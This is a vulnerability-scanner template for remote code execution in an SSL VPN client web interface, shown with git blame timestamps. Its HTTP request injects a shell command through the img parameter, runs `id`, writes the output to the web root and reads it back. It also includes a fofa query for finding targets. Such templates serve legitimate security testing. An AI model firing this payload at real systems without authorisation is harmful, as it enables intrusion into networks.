2023-12-09 10:06:59 +00:00
|
|
|
id: sslvpn-client-rce
|
|
|
|
|
|
|
|
|
|
info:
|
|
|
|
|
name: SSL VPN Client - Remote Code Execution
|
|
|
|
|
author: DhiyaneshDK
|
|
|
|
|
severity: critical
|
2024-01-02 15:45:12 +00:00
|
|
|
description: SSL VPN Client is vulnerable to RCE.
|
2023-12-09 10:06:59 +00:00
|
|
|
reference:
|
|
|
|
|
- https://github.com/server2565543706/Poc/blob/master/POC/anquantongsha.py
|
|
|
|
|
- https://github.com/Vme18000yuan/FreePOC/blob/master/poc/pocsuite/security_products_rce.py
|
|
|
|
|
metadata:
|
|
|
|
|
verified: true
|
2024-01-14 13:49:27 +00:00
|
|
|
max-request: 2
|
2023-12-20 07:18:29 +00:00
|
|
|
fofa-query: body="/webui/images/default/default/alert_close.jpg"
|
2023-12-09 10:06:59 +00:00
|
|
|
tags: sslvpn,rce,intrusive
|
|
|
|
|
variables:
|
|
|
|
|
filename: "{{to_lower(rand_text_alpha(5))}}"
|
|
|
|
|
|
|
|
|
|
http:
|
2023-12-20 07:18:29 +00:00
|
|
|
- raw:
|
|
|
|
|
- |
|
|
|
|
|
GET /sslvpn/sslvpn_client.php?client=logoImg&img=%20/tmp|echo%20%60id%60%20|tee%20/usr/local/webui/sslvpn/{{filename}}.txt HTTP/1.1
|
|
|
|
|
Host: {{Hostname}}
|
|
|
|
|
|
|
|
|
|
- |
|
|
|
|
|
GET /sslvpn/{{filename}}.txt HTTP/1.1
|
|
|
|
|
Host: {{Hostname}}
|
2023-12-09 10:06:59 +00:00
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
|
matchers:
|
|
|
|
|
- type: regex
|
|
|
|
|
part: body_2
|
|
|
|
|
regex:
|
|
|
|
|
- 'uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)'
|
|
|
|
|
|
|
|
|
|
- type: word
|
|
|
|
|
part: header_2
|
|
|
|
|
words:
|
|
|
|
|
- 'text/plain'
|
2024-01-14 14:05:19 +00:00
|
|
|
# digest: 4a0a0047304502205b5b855cde6a1e6f296eee909cfb5ec15c7f0f8de7d933801ff8f4c6cd6c8e30022100bbac172cd0a4b25b2622fe991d400013d2309a7a007c542e5e8b944e499a1828:922c64590222798bb761d5b6d8e72950
|
